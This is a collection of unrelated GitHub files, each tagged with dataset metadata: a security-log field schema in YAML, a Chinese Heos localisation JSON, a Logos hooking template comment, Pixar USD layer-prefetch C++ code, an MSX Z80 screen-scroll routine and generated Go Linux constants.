description: <span>This key is used to capture the directory of the target process
or file</span>
- name: directory_src
overwrite: true
type: keyword
description: This key is used to capture the directory of the source process
or file
- name: file_entropy
overwrite: true
type: double
description: This is used to capture entropy vale of a file
- name: file_vendor
overwrite: true
type: keyword
description: This is used to capture Company name of file located in version_info
- name: task_name
overwrite: true
type: keyword
description: This is used to capture name of the task
- name: web
overwrite: true
type: group
fields:
- name: fqdn
overwrite: true
type: keyword
description: Fully Qualified Domain Names
- name: web_cookie
overwrite: true
type: keyword
description: This key is used to capture the Web cookies specifically.
- name: alias_host
overwrite: true
type: keyword
- name: reputation_num
overwrite: true
type: double
description: Reputation Number of an entity. Typically used for Web Domains
- name: web_ref_domain
overwrite: true
type: keyword
description: Web referer's domain
- name: web_ref_query
overwrite: true
type: keyword
description: This key captures Web referer's query portion of the URL
- name: remote_domain
overwrite: true
type: keyword
- name: web_ref_page
overwrite: true
type: keyword
description: This key captures Web referer's page information
- name: web_ref_root
overwrite: true
type: keyword
description: Web referer's root URL path
- name: cn_asn_dst
overwrite: true
type: keyword
- name: cn_rpackets
overwrite: true
type: keyword
- name: urlpage
overwrite: true
type: keyword
- name: urlroot
overwrite: true
type: keyword
- name: p_url
overwrite: true
type: keyword
- name: p_user_agent
overwrite: true
type: keyword
- name: p_web_cookie
overwrite: true
type: keyword
- name: p_web_method
overwrite: true
type: keyword
- name: p_web_referer
overwrite: true
type: keyword
- name: web_extension_tmp
overwrite: true
type: keyword
- name: web_page
overwrite: true
type: keyword
- name: threat
overwrite: true
type: group
fields:
- name: threat_category
overwrite: true
type: keyword
description: This key captures Threat Name/Threat Category/Categorization of
alert
- name: threat_desc
overwrite: true
type: keyword
description: This key is used to capture the threat description from the session
directly or inferred
- name: alert
overwrite: true
type: keyword
description: This key is used to capture name of the alert
- name: threat_source
overwrite: true
type: keyword
description: This key is used to capture source of the threat
- name: crypto
overwrite: true
type: group
fields:
- name: crypto
overwrite: true
type: keyword
description: This key is used to capture the Encryption Type or Encryption Key
only
- name: cipher_src
overwrite: true
type: keyword
description: This key is for Source (Client) Cipher
- name: cert_subject
overwrite: true
type: keyword
description: This key is used to capture the Certificate organization only
- name: peer
overwrite: true
type: keyword
description: This key is for Encryption peer's IP Address
- name: cipher_size_src
overwrite: true
type: long
description: This key captures Source (Client) Cipher Size
- name: ike
overwrite: true
type: keyword
description: IKE negotiation phase.
- name: scheme
overwrite: true
type: keyword
description: This key captures the Encryption scheme used
- name: peer_id
overwrite: true
type: keyword
description: "This key is for Encryption peer\u2019s identity"
- name: sig_type
overwrite: true
type: keyword
description: This key captures the Signature Type
- name: cert_issuer
overwrite: true
type: keyword
- name: cert_host_name
overwrite: true
type: keyword
description: Deprecated key defined only in table map.
- name: cert_error
overwrite: true
type: keyword
description: This key captures the Certificate Error String
- name: cipher_dst
overwrite: true
type: keyword
description: This key is for Destination (Server) Cipher
- name: cipher_size_dst
overwrite: true
type: long
description: This key captures Destination (Server) Cipher Size
- name: ssl_ver_src
overwrite: true
type: keyword
description: Deprecated, use version
- name: d_certauth
overwrite: true
type: keyword
- name: s_certauth
overwrite: true
type: keyword
- name: ike_cookie1
overwrite: true
type: keyword
description: "ID of the negotiation \u2014 sent for ISAKMP Phase One"
- name: ike_cookie2
overwrite: true
type: keyword
description: "ID of the negotiation \u2014 sent for ISAKMP Phase Two"
- name: cert_checksum
overwrite: true
type: keyword
- name: cert_host_cat
overwrite: true
type: keyword
description: This key is used for the hostname category value of a certificate
- name: cert_serial
overwrite: true
type: keyword
description: This key is used to capture the Certificate serial number only
- name: cert_status
overwrite: true
type: keyword
description: This key captures Certificate validation status
- name: ssl_ver_dst
overwrite: true
type: keyword
description: Deprecated, use version
- name: cert_keysize
overwrite: true
type: keyword
- name: cert_username
overwrite: true
type: keyword
- name: https_insact
overwrite: true
type: keyword
- name: https_valid
overwrite: true
type: keyword
- name: cert_ca
overwrite: true
type: keyword
description: This key is used to capture the Certificate signing authority only
- name: cert_common
overwrite: true
type: keyword
description: This key is used to capture the Certificate common name only
- name: wireless
overwrite: true
type: group
fields:
- name: wlan_ssid
overwrite: true
type: keyword
description: This key is used to capture the ssid of a Wireless Session
- name: access_point
overwrite: true
type: keyword
description: This key is used to capture the access point name.
- name: wlan_channel
overwrite: true
type: long
description: This is used to capture the channel names
- name: wlan_name
overwrite: true
type: keyword
description: This key captures either WLAN number/name
- name: storage
overwrite: true
type: group
fields:
- name: disk_volume
overwrite: true
type: keyword
description: A unique name assigned to logical units (volumes) within a physical
disk
- name: lun
overwrite: true
type: keyword
description: Logical Unit Number.This key is a very useful concept in Storage.
- name: pwwn
overwrite: true
type: keyword
description: This uniquely identifies a port on a HBA.
- name: physical
overwrite: true
type: group
fields:
- name: org_dst
overwrite: true
type: keyword
description: This is used to capture the destination organization based on the
GEOPIP Maxmind database.
- name: org_src
overwrite: true
type: keyword
description: This is used to capture the source organization based on the GEOPIP
Maxmind database.
- name: healthcare
overwrite: true
type: group
fields:
- name: patient_fname
overwrite: true
type: keyword
description: This key is for First Names only, this is used for Healthcare predominantly
to capture Patients information
- name: patient_id
overwrite: true
type: keyword
description: This key captures the unique ID for a patient
- name: patient_lname
overwrite: true
type: keyword
description: This key is for Last Names only, this is used for Healthcare predominantly
to capture Patients information
- name: patient_mname
overwrite: true
type: keyword
description: This key is for Middle Names only, this is used for Healthcare
predominantly to capture Patients information
- name: endpoint
overwrite: true
type: group
fields:
- name: host_state
overwrite: true
type: keyword
description: This key is used to capture the current state of the machine, such
as <strong>blacklisted</strong>, <strong>infected</strong>, <strong>firewall
disabled</strong> and so on
- name: registry_key
overwrite: true
type: keyword
description: This key captures the path to the registry key
- name: registry_value
overwrite: true
type: keyword
description: This key captures values or decorators used within a registry entry
| {
"pile_set_name": "Github"
} |
{
"config": {
"abort": {
"already_setup": "\u50c5\u80fd\u8a2d\u5b9a\u4e00\u7d44 Heos \u9023\u7dda\uff0c\u5c07\u652f\u63f4\u7db2\u8def\u4e2d\u6240\u6709\u5c0d\u61c9\u8a2d\u5099\u3002"
},
"error": {
"connection_failure": "\u7121\u6cd5\u9023\u7dda\u81f3\u6307\u5b9a\u4e3b\u6a5f\u7aef\u3002"
},
"step": {
"user": {
"data": {
"host": "\u4e3b\u6a5f\u7aef"
},
"description": "\u8acb\u8f38\u5165\u4e3b\u6a5f\u6bb5\u540d\u7a31\u6216 Heos \u8a2d\u5099 IP \u4f4d\u5740\uff08\u5df2\u900f\u904e\u6709\u7dda\u7db2\u8def\u9023\u7dda\uff09\u3002",
"title": "\u9023\u7dda\u81f3 Heos"
}
}
}
} | {
"pile_set_name": "Github"
} |
/* How to Hook with Logos
Hooks are written with syntax similar to that of an Objective-C @implementation.
You don't need to #include <substrate.h>, it will be done automatically, as will
the generation of a class list and an automatic constructor.
%hook ClassName
// Hooking a class method
+ (id)sharedInstance {
return %orig;
}
// Hooking an instance method with an argument.
- (void)messageName:(int)argument {
%log; // Write a message about this call, including its class, name and arguments, to the system log.
%orig; // Call through to the original function with its original arguments.
%orig(nil); // Call through to the original function with a custom argument.
// If you use %orig(), you MUST supply all arguments (except for self and _cmd, the automatically generated ones.)
}
// Hooking an instance method with no arguments.
- (id)noArguments {
%log;
id awesome = %orig;
[awesome doSomethingElse];
return awesome;
}
// Always make sure you clean up after yourself; Not doing so could have grave consequences!
%end
*/
| {
"pile_set_name": "Github"
} |
//
// Copyright 2016 Pixar
//
// Licensed under the Apache License, Version 2.0 (the "Apache License")
// with the following modification; you may not use this file except in
// compliance with the Apache License and the following modification to it:
// Section 6. Trademarks. is deleted and replaced with:
//
// 6. Trademarks. This License does not grant permission to use the trade
// names, trademarks, service marks, or product names of the Licensor
// and its affiliates, except as required to comply with Section 4(c) of
// the License and to reproduce the content of the NOTICE file.
//
// You may obtain a copy of the Apache License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the Apache License with the above modification is
// distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the Apache License for the specific
// language governing permissions and limitations under the Apache License.
//
#include "pxr/pxr.h"
#include "pxr/usd/pcp/layerPrefetchRequest.h"
#include "pxr/usd/pcp/layerStackRegistry.h"
#include "pxr/usd/sdf/layerUtils.h"
#include "pxr/base/work/arenaDispatcher.h"
#include "pxr/base/work/threadLimits.h"
#include <tbb/spin_mutex.h>
PXR_NAMESPACE_OPEN_SCOPE
namespace {
struct _Opener
{
explicit _Opener(const Pcp_MutedLayers& mutedLayers,
std::set<SdfLayerRefPtr> *retainedLayers)
: _mutedLayers(mutedLayers)
, _retainedLayers(retainedLayers) {}
~_Opener() { _dispatcher.Wait(); }
void OpenSublayers(const SdfLayerRefPtr &layer,
const SdfLayer::FileFormatArguments &layerArgs) {
TF_FOR_ALL(path, layer->GetSubLayerPaths()) {
_dispatcher.Run(
&_Opener::_OpenSublayer, this, *path, layer, layerArgs);
}
}
private:
void _OpenSublayer(std::string path,
const SdfLayerRefPtr &anchorLayer,
const SdfLayer::FileFormatArguments &layerArgs) {
if (_mutedLayers.IsLayerMuted(anchorLayer, path)) {
return;
}
// Open this specific sublayer path.
// The call to SdfFindOrOpenRelativeToLayer() may take some time,
// potentially multiple seconds.
if (SdfLayerRefPtr sublayer =
SdfFindOrOpenRelativeToLayer(anchorLayer, &path, layerArgs)) {
// Retain this sublayer.
bool didInsert;
{
tbb::spin_mutex::scoped_lock lock(_retainedLayersMutex);
didInsert = _retainedLayers->insert(sublayer).second;
}
// Open the nested sublayers. Only do this if we haven't seen this
// layer before, i.e. didInsert is true.
if (didInsert)
OpenSublayers(sublayer, layerArgs);
}
}
WorkArenaDispatcher _dispatcher;
const Pcp_MutedLayers& _mutedLayers;
std::set<SdfLayerRefPtr> *_retainedLayers;
mutable tbb::spin_mutex _retainedLayersMutex;
};
} // anon
void
PcpLayerPrefetchRequest::RequestSublayerStack(
const SdfLayerRefPtr &layer,
const SdfLayer::FileFormatArguments &args)
{
_sublayerRequests.insert(std::make_pair(layer, args));
}
void
PcpLayerPrefetchRequest::Run(const Pcp_MutedLayers& mutedLayers)
{
if (WorkGetConcurrencyLimit() <= 1) {
// Do not bother pre-fetching if we do not have extra threads
// available.
return;
}
// Release the GIL so we don't deadlock when Sd tries to get a path
// resolver (which does ref-counting on the resolver, which requires
// the GIL to manage TfRefBase identity-uniqueness).
TF_PY_ALLOW_THREADS_IN_SCOPE();
std::set<_Request> requests;
requests.swap(_sublayerRequests);
// Open all the sublayers in the request.
_Opener opener(mutedLayers, &_retainedLayers);
TF_FOR_ALL(req, requests)
opener.OpenSublayers(req->first, req->second);
}
PXR_NAMESPACE_CLOSE_SCOPE
| {
"pile_set_name": "Github"
} |
;
; ANSI Video handling for the MSX
;
; Handles colors
;
; Scrollup
;
; Stefano Bodrato - Sept. 2017
;
; $Id: f_ansi_scrollup_nobios.asm $
;
SECTION code_clib
PUBLIC ansi_SCROLLUP
PUBLIC __tms9918_scroll_buffer
EXTERN __tms9918_attribute
EXTERN LDIRVM
EXTERN LDIRMV
EXTERN FILVRM
.ansi_SCROLLUP
push ix
ld b,23
ld hl,256
.scloop
push bc
push hl
ld de,__tms9918_scroll_buffer
ld bc,256
call LDIRMV
pop hl
push hl
ld de,-256
add hl,de
ld de,__tms9918_scroll_buffer
ld bc,256
ex de,hl
call LDIRVM
pop hl
push hl
ld de,8192
add hl,de
push hl
ld de,__tms9918_scroll_buffer
ld bc,256
call LDIRMV
pop hl
ld de,-256
add hl,de
ld de,__tms9918_scroll_buffer
ld bc,256
ex de,hl
call LDIRVM
pop hl
inc h
pop bc
djnz scloop
dec h
xor a
ld bc,256
call FILVRM
pop ix
ret
SECTION bss_clib
.__tms9918_scroll_buffer defs 256
| {
"pile_set_name": "Github"
} |
// mkerrors.sh -Wall -Werror -static -I/tmp/include -m64
// Code generated by the command above; see README.md. DO NOT EDIT.
// +build amd64,linux
// Created by cgo -godefs - DO NOT EDIT
// cgo -godefs -- -Wall -Werror -static -I/tmp/include -m64 _const.go
package unix
import "syscall"
const (
AF_ALG = 0x26
AF_APPLETALK = 0x5
AF_ASH = 0x12
AF_ATMPVC = 0x8
AF_ATMSVC = 0x14
AF_AX25 = 0x3
AF_BLUETOOTH = 0x1f
AF_BRIDGE = 0x7
AF_CAIF = 0x25
AF_CAN = 0x1d
AF_DECnet = 0xc
AF_ECONET = 0x13
AF_FILE = 0x1
AF_IB = 0x1b
AF_IEEE802154 = 0x24
AF_INET = 0x2
AF_INET6 = 0xa
AF_IPX = 0x4
AF_IRDA = 0x17
AF_ISDN = 0x22
AF_IUCV = 0x20
AF_KCM = 0x29
AF_KEY = 0xf
AF_LLC = 0x1a
AF_LOCAL = 0x1
AF_MAX = 0x2c
AF_MPLS = 0x1c
AF_NETBEUI = 0xd
AF_NETLINK = 0x10
AF_NETROM = 0x6
AF_NFC = 0x27
AF_PACKET = 0x11
AF_PHONET = 0x23
AF_PPPOX = 0x18
AF_QIPCRTR = 0x2a
AF_RDS = 0x15
AF_ROSE = 0xb
AF_ROUTE = 0x10
AF_RXRPC = 0x21
AF_SECURITY = 0xe
AF_SMC = 0x2b
AF_SNA = 0x16
AF_TIPC = 0x1e
AF_UNIX = 0x1
AF_UNSPEC = 0x0
AF_VSOCK = 0x28
AF_WANPIPE = 0x19
AF_X25 = 0x9
ALG_OP_DECRYPT = 0x0
ALG_OP_ENCRYPT = 0x1
ALG_SET_AEAD_ASSOCLEN = 0x4
ALG_SET_AEAD_AUTHSIZE = 0x5
ALG_SET_IV = 0x2
ALG_SET_KEY = 0x1
ALG_SET_OP = 0x3
ARPHRD_6LOWPAN = 0x339
ARPHRD_ADAPT = 0x108
ARPHRD_APPLETLK = 0x8
ARPHRD_ARCNET = 0x7
ARPHRD_ASH = 0x30d
ARPHRD_ATM = 0x13
ARPHRD_AX25 = 0x3
ARPHRD_BIF = 0x307
ARPHRD_CAIF = 0x336
ARPHRD_CAN = 0x118
ARPHRD_CHAOS = 0x5
ARPHRD_CISCO = 0x201
ARPHRD_CSLIP = 0x101
ARPHRD_CSLIP6 = 0x103
ARPHRD_DDCMP = 0x205
ARPHRD_DLCI = 0xf
ARPHRD_ECONET = 0x30e
ARPHRD_EETHER = 0x2
ARPHRD_ETHER = 0x1
ARPHRD_EUI64 = 0x1b
ARPHRD_FCAL = 0x311
ARPHRD_FCFABRIC = 0x313
ARPHRD_FCPL = 0x312
ARPHRD_FCPP = 0x310
ARPHRD_FDDI = 0x306
ARPHRD_FRAD = 0x302
ARPHRD_HDLC = 0x201
ARPHRD_HIPPI = 0x30c
ARPHRD_HWX25 = 0x110
ARPHRD_IEEE1394 = 0x18
ARPHRD_IEEE802 = 0x6
ARPHRD_IEEE80211 = 0x321
ARPHRD_IEEE80211_PRISM = 0x322
ARPHRD_IEEE80211_RADIOTAP = 0x323
ARPHRD_IEEE802154 = 0x324
ARPHRD_IEEE802154_MONITOR = 0x325
ARPHRD_IEEE802_TR = 0x320
ARPHRD_INFINIBAND = 0x20
ARPHRD_IP6GRE = 0x337
ARPHRD_IPDDP = 0x309
ARPHRD_IPGRE = 0x30a
ARPHRD_IRDA = 0x30f
ARPHRD_LAPB = 0x204
ARPHRD_LOCALTLK = 0x305
ARPHRD_LOOPBACK = 0x304
ARPHRD_METRICOM = 0x17
ARPHRD_NETLINK = 0x338
ARPHRD_NETROM = 0x0
ARPHRD_NONE = 0xfffe
ARPHRD_PHONET = 0x334
ARPHRD_PHONET_PIPE = 0x335
ARPHRD_PIMREG = 0x30b
ARPHRD_PPP = 0x200
ARPHRD_PRONET = 0x4
ARPHRD_RAWHDLC = 0x206
ARPHRD_ROSE = 0x10e
ARPHRD_RSRVD = 0x104
ARPHRD_SIT = 0x308
ARPHRD_SKIP = 0x303
ARPHRD_SLIP = 0x100
ARPHRD_SLIP6 = 0x102
ARPHRD_TUNNEL = 0x300
ARPHRD_TUNNEL6 = 0x301
ARPHRD_VOID = 0xffff
ARPHRD_VSOCKMON = 0x33a
ARPHRD_X25 = 0x10f
B0 = 0x0
B1000000 = 0x1008
B110 = 0x3
B115200 = 0x1002
B1152000 = 0x1009
B1200 = 0x9
B134 = 0x4
B150 = 0x5
B1500000 = 0x100a
B1800 = 0xa
B19200 = 0xe
B200 = 0x6
B2000000 = 0x100b
B230400 = 0x1003
B2400 = 0xb
B2500000 = 0x100c
B300 = 0x7
B3000000 = 0x100d
B3500000 = 0x100e
B38400 = 0xf
B4000000 = 0x100f
B460800 = 0x1004
B4800 = 0xc
B50 = 0x1
B500000 = 0x1005
B57600 = 0x1001
B576000 = 0x1006
B600 = 0x8
B75 = 0x2
B921600 = 0x1007
B9600 = 0xd
BLKBSZGET = 0x80081270
BLKBSZSET = 0x40081271
BLKFLSBUF = 0x1261
BLKFRAGET = 0x1265
BLKFRASET = 0x1264
BLKGETSIZE = 0x1260
BLKGETSIZE64 = 0x80081272
BLKPBSZGET = 0x127b
BLKRAGET = 0x1263
BLKRASET = 0x1262
BLKROGET = 0x125e
BLKROSET = 0x125d
BLKRRPART = 0x125f
BLKSECTGET = 0x1267
BLKSECTSET = 0x1266
BLKSSZGET = 0x1268
BOTHER = 0x1000
BPF_A = 0x10
BPF_ABS = 0x20
BPF_ADD = 0x0
BPF_ALU = 0x4
BPF_AND = 0x50
BPF_B = 0x10
BPF_DIV = 0x30
BPF_H = 0x8
BPF_IMM = 0x0
BPF_IND = 0x40
BPF_JA = 0x0
BPF_JEQ = 0x10
BPF_JGE = 0x30
BPF_JGT = 0x20
BPF_JMP = 0x5
BPF_JSET = 0x40
BPF_K = 0x0
BPF_LD = 0x0
BPF_LDX = 0x1
BPF_LEN = 0x80
BPF_LL_OFF = -0x200000
BPF_LSH = 0x60
BPF_MAJOR_VERSION = 0x1
BPF_MAXINSNS = 0x1000
BPF_MEM = 0x60
BPF_MEMWORDS = 0x10
BPF_MINOR_VERSION = 0x1
BPF_MISC = 0x7
BPF_MOD = 0x90
BPF_MSH = 0xa0
BPF_MUL = 0x20
BPF_NEG = 0x80
BPF_NET_OFF = -0x100000
BPF_OR = 0x40
BPF_RET = 0x6
BPF_RSH = 0x70
BPF_ST = 0x2
BPF_STX = 0x3
BPF_SUB = 0x10
BPF_TAX = 0x0
BPF_TXA = 0x80
BPF_W = 0x0
BPF_X = 0x8
BPF_XOR = 0xa0
BRKINT = 0x2
BS0 = 0x0
BS1 = 0x2000
BSDLY = 0x2000
CAN_BCM = 0x2
CAN_EFF_FLAG = 0x80000000
CAN_EFF_ID_BITS = 0x1d
CAN_EFF_MASK = 0x1fffffff
CAN_ERR_FLAG = 0x20000000
CAN_ERR_MASK = 0x1fffffff
CAN_INV_FILTER = 0x20000000
CAN_ISOTP = 0x6
CAN_MAX_DLC = 0x8
CAN_MAX_DLEN = 0x8
CAN_MCNET = 0x5
CAN_MTU = 0x10
CAN_NPROTO = 0x7
CAN_RAW = 0x1
CAN_RAW_FILTER_MAX = 0x200
CAN_RTR_FLAG = 0x40000000
CAN_SFF_ID_BITS = 0xb
CAN_SFF_MASK = 0x7ff
CAN_TP16 = 0x3
CAN_TP20 = 0x4
CBAUD = 0x100f
CBAUDEX = 0x1000
CFLUSH = 0xf
CIBAUD = 0x100f0000
CLOCAL = 0x800
CLOCK_BOOTTIME = 0x7
CLOCK_BOOTTIME_ALARM = 0x9
CLOCK_DEFAULT = 0x0
CLOCK_EXT = 0x1
CLOCK_INT = 0x2
CLOCK_MONOTONIC = 0x1
CLOCK_MONOTONIC_COARSE = 0x6
CLOCK_MONOTONIC_RAW = 0x4
CLOCK_PROCESS_CPUTIME_ID = 0x2
CLOCK_REALTIME = 0x0
CLOCK_REALTIME_ALARM = 0x8
CLOCK_REALTIME_COARSE = 0x5
CLOCK_TAI = 0xb
CLOCK_THREAD_CPUTIME_ID = 0x3
CLOCK_TXFROMRX = 0x4
CLOCK_TXINT = 0x3
CLONE_CHILD_CLEARTID = 0x200000
CLONE_CHILD_SETTID = 0x1000000
CLONE_DETACHED = 0x400000
CLONE_FILES = 0x400
CLONE_FS = 0x200
CLONE_IO = 0x80000000
CLONE_NEWCGROUP = 0x2000000
CLONE_NEWIPC = 0x8000000
CLONE_NEWNET = 0x40000000
CLONE_NEWNS = 0x20000
CLONE_NEWPID = 0x20000000
CLONE_NEWUSER = 0x10000000
CLONE_NEWUTS = 0x4000000
CLONE_PARENT = 0x8000
CLONE_PARENT_SETTID = 0x100000
CLONE_PTRACE = 0x2000
CLONE_SETTLS = 0x80000
CLONE_SIGHAND = 0x800
CLONE_SYSVSEM = 0x40000
CLONE_THREAD = 0x10000
CLONE_UNTRACED = 0x800000
CLONE_VFORK = 0x4000
CLONE_VM = 0x100
CMSPAR = 0x40000000
CR0 = 0x0
CR1 = 0x200
CR2 = 0x400
CR3 = 0x600
CRDLY = 0x600
CREAD = 0x80
CRTSCTS = 0x80000000
CS5 = 0x0
CS6 = 0x10
CS7 = 0x20
CS8 = 0x30
CSIGNAL = 0xff
CSIZE = 0x30
CSTART = 0x11
CSTATUS = 0x0
CSTOP = 0x13
CSTOPB = 0x40
CSUSP = 0x1a
DT_BLK = 0x6
DT_CHR = 0x2
DT_DIR = 0x4
DT_FIFO = 0x1
DT_LNK = 0xa
DT_REG = 0x8
DT_SOCK = 0xc
DT_UNKNOWN = 0x0
DT_WHT = 0xe
ECHO = 0x8
ECHOCTL = 0x200
ECHOE = 0x10
ECHOK = 0x20
ECHOKE = 0x800
ECHONL = 0x40
ECHOPRT = 0x400
EFD_CLOEXEC = 0x80000
EFD_NONBLOCK = 0x800
EFD_SEMAPHORE = 0x1
ENCODING_DEFAULT = 0x0
ENCODING_FM_MARK = 0x3
ENCODING_FM_SPACE = 0x4
ENCODING_MANCHESTER = 0x5
ENCODING_NRZ = 0x1
ENCODING_NRZI = 0x2
EPOLLERR = 0x8
EPOLLET = 0x80000000
EPOLLEXCLUSIVE = 0x10000000
EPOLLHUP = 0x10
EPOLLIN = 0x1
EPOLLMSG = 0x400
EPOLLONESHOT = 0x40000000
EPOLLOUT = 0x4
EPOLLPRI = 0x2
EPOLLRDBAND = 0x80
EPOLLRDHUP = 0x2000
EPOLLRDNORM = 0x40
EPOLLWAKEUP = 0x20000000
EPOLLWRBAND = 0x200
EPOLLWRNORM = 0x100
EPOLL_CLOEXEC = 0x80000
EPOLL_CTL_ADD = 0x1
EPOLL_CTL_DEL = 0x2
EPOLL_CTL_MOD = 0x3
ETH_P_1588 = 0x88f7
ETH_P_8021AD = 0x88a8
ETH_P_8021AH = 0x88e7
ETH_P_8021Q = 0x8100
ETH_P_80221 = 0x8917
ETH_P_802_2 = 0x4
ETH_P_802_3 = 0x1
ETH_P_802_3_MIN = 0x600
ETH_P_802_EX1 = 0x88b5
ETH_P_AARP = 0x80f3
ETH_P_AF_IUCV = 0xfbfb
ETH_P_ALL = 0x3
ETH_P_AOE = 0x88a2
ETH_P_ARCNET = 0x1a
ETH_P_ARP = 0x806
ETH_P_ATALK = 0x809b
ETH_P_ATMFATE = 0x8884
ETH_P_ATMMPOA = 0x884c
ETH_P_AX25 = 0x2
ETH_P_BATMAN = 0x4305
ETH_P_BPQ = 0x8ff
ETH_P_CAIF = 0xf7
ETH_P_CAN = 0xc
ETH_P_CANFD = 0xd
ETH_P_CONTROL = 0x16
ETH_P_CUST = 0x6006
ETH_P_DDCMP = 0x6
ETH_P_DEC = 0x6000
ETH_P_DIAG = 0x6005
ETH_P_DNA_DL = 0x6001
ETH_P_DNA_RC = 0x6002
ETH_P_DNA_RT = 0x6003
ETH_P_DSA = 0x1b
ETH_P_ECONET = 0x18
ETH_P_EDSA = 0xdada
ETH_P_FCOE = 0x8906
ETH_P_FIP = 0x8914
ETH_P_HDLC = 0x19
ETH_P_HSR = 0x892f
ETH_P_IBOE = 0x8915
ETH_P_IEEE802154 = 0xf6
ETH_P_IEEEPUP = 0xa00
ETH_P_IEEEPUPAT = 0xa01
ETH_P_IP = 0x800
ETH_P_IPV6 = 0x86dd
ETH_P_IPX = 0x8137
ETH_P_IRDA = 0x17
ETH_P_LAT = 0x6004
ETH_P_LINK_CTL = 0x886c
ETH_P_LOCALTALK = 0x9
ETH_P_LOOP = 0x60
ETH_P_LOOPBACK = 0x9000
ETH_P_MACSEC = 0x88e5
ETH_P_MOBITEX = 0x15
ETH_P_MPLS_MC = 0x8848
ETH_P_MPLS_UC = 0x8847
ETH_P_MVRP = 0x88f5
ETH_P_NCSI = 0x88f8
ETH_P_PAE = 0x888e
ETH_P_PAUSE = 0x8808
ETH_P_PHONET = 0xf5
ETH_P_PPPTALK = 0x10
ETH_P_PPP_DISC = 0x8863
ETH_P_PPP_MP = 0x8
ETH_P_PPP_SES = 0x8864
ETH_P_PRP = 0x88fb
ETH_P_PUP = 0x200
ETH_P_PUPAT = 0x201
ETH_P_QINQ1 = 0x9100
ETH_P_QINQ2 = 0x9200
ETH_P_QINQ3 = 0x9300
ETH_P_RARP = 0x8035
ETH_P_SCA = 0x6007
ETH_P_SLOW = 0x8809
ETH_P_SNAP = 0x5
ETH_P_TDLS = 0x890d
ETH_P_TEB = 0x6558
ETH_P_TIPC = 0x88ca
ETH_P_TRAILER = 0x1c
ETH_P_TR_802_2 = 0x11
ETH_P_TSN = 0x22f0
ETH_P_WAN_PPP = 0x7
ETH_P_WCCP = 0x883e
ETH_P_X25 = 0x805
ETH_P_XDSA = 0xf8
EXTA = 0xe
EXTB = 0xf
EXTPROC = 0x10000
FALLOC_FL_COLLAPSE_RANGE = 0x8
FALLOC_FL_INSERT_RANGE = 0x20
FALLOC_FL_KEEP_SIZE = 0x1
FALLOC_FL_NO_HIDE_STALE = 0x4
FALLOC_FL_PUNCH_HOLE = 0x2
FALLOC_FL_UNSHARE_RANGE = 0x40
FALLOC_FL_ZERO_RANGE = 0x10
FD_CLOEXEC = 0x1
FD_SETSIZE = 0x400
FF0 = 0x0
FF1 = 0x8000
FFDLY = 0x8000
FLUSHO = 0x1000
FS_ENCRYPTION_MODE_AES_128_CBC = 0x5
FS_ENCRYPTION_MODE_AES_128_CTS = 0x6
FS_ENCRYPTION_MODE_AES_256_CBC = 0x3
FS_ENCRYPTION_MODE_AES_256_CTS = 0x4
FS_ENCRYPTION_MODE_AES_256_GCM = 0x2
FS_ENCRYPTION_MODE_AES_256_XTS = 0x1
FS_ENCRYPTION_MODE_INVALID = 0x0
FS_IOC_GET_ENCRYPTION_POLICY = 0x400c6615
FS_IOC_GET_ENCRYPTION_PWSALT = 0x40106614
FS_IOC_SET_ENCRYPTION_POLICY = 0x800c6613
FS_KEY_DESCRIPTOR_SIZE = 0x8
FS_KEY_DESC_PREFIX = "fscrypt:"
FS_KEY_DESC_PREFIX_SIZE = 0x8
FS_MAX_KEY_SIZE = 0x40
FS_POLICY_FLAGS_PAD_16 = 0x2
FS_POLICY_FLAGS_PAD_32 = 0x3
FS_POLICY_FLAGS_PAD_4 = 0x0
FS_POLICY_FLAGS_PAD_8 = 0x1
FS_POLICY_FLAGS_PAD_MASK = 0x3
FS_POLICY_FLAGS_VALID = 0x3
F_DUPFD = 0x0
F_DUPFD_CLOEXEC = 0x406
F_EXLCK = 0x4
F_GETFD = 0x1
F_GETFL = 0x3
F_GETLEASE = 0x401
F_GETLK = 0x5
F_GETLK64 = 0x5
F_GETOWN = 0x9
F_GETOWN_EX = 0x10
F_GETPIPE_SZ = 0x408
F_GETSIG = 0xb
F_LOCK = 0x1
F_NOTIFY = 0x402
F_OFD_GETLK = 0x24
F_OFD_SETLK = 0x25
F_OFD_SETLKW = 0x26
F_OK = 0x0
F_RDLCK = 0x0
F_SETFD = 0x2
F_SETFL = 0x4
F_SETLEASE = 0x400
F_SETLK = 0x6
F_SETLK64 = 0x6
F_SETLKW = 0x7
F_SETLKW64 = 0x7
F_SETOWN = 0x8
F_SETOWN_EX = 0xf
F_SETPIPE_SZ = 0x407
F_SETSIG = 0xa
F_SHLCK = 0x8
F_TEST = 0x3
F_TLOCK = 0x2
F_ULOCK = 0x0
F_UNLCK = 0x2
F_WRLCK = 0x1
GENL_ADMIN_PERM = 0x1
GENL_CMD_CAP_DO = 0x2
GENL_CMD_CAP_DUMP = 0x4
GENL_CMD_CAP_HASPOL = 0x8
GENL_HDRLEN = 0x4
GENL_ID_CTRL = 0x10
GENL_ID_PMCRAID = 0x12
GENL_ID_VFS_DQUOT = 0x11
GENL_MAX_ID = 0x3ff
GENL_MIN_ID = 0x10
GENL_NAMSIZ = 0x10
GENL_START_ALLOC = 0x13
GENL_UNS_ADMIN_PERM = 0x10
GRND_NONBLOCK = 0x1
GRND_RANDOM = 0x2
HUPCL = 0x400
IBSHIFT = 0x10
ICANON = 0x2
ICMPV6_FILTER = 0x1
ICRNL = 0x100
IEXTEN = 0x8000
IFA_F_DADFAILED = 0x8
IFA_F_DEPRECATED = 0x20
IFA_F_HOMEADDRESS = 0x10
IFA_F_MANAGETEMPADDR = 0x100
IFA_F_MCAUTOJOIN = 0x400
IFA_F_NODAD = 0x2
IFA_F_NOPREFIXROUTE = 0x200
IFA_F_OPTIMISTIC = 0x4
IFA_F_PERMANENT = 0x80
IFA_F_SECONDARY = 0x1
IFA_F_STABLE_PRIVACY = 0x800
IFA_F_TEMPORARY = 0x1
IFA_F_TENTATIVE = 0x40
IFA_MAX = 0x8
IFF_ALLMULTI = 0x200
IFF_ATTACH_QUEUE = 0x200
IFF_AUTOMEDIA = 0x4000
IFF_BROADCAST = 0x2
IFF_DEBUG = 0x4
IFF_DETACH_QUEUE = 0x400
IFF_DORMANT = 0x20000
IFF_DYNAMIC = 0x8000
IFF_ECHO = 0x40000
IFF_LOOPBACK = 0x8
IFF_LOWER_UP = 0x10000
IFF_MASTER = 0x400
IFF_MULTICAST = 0x1000
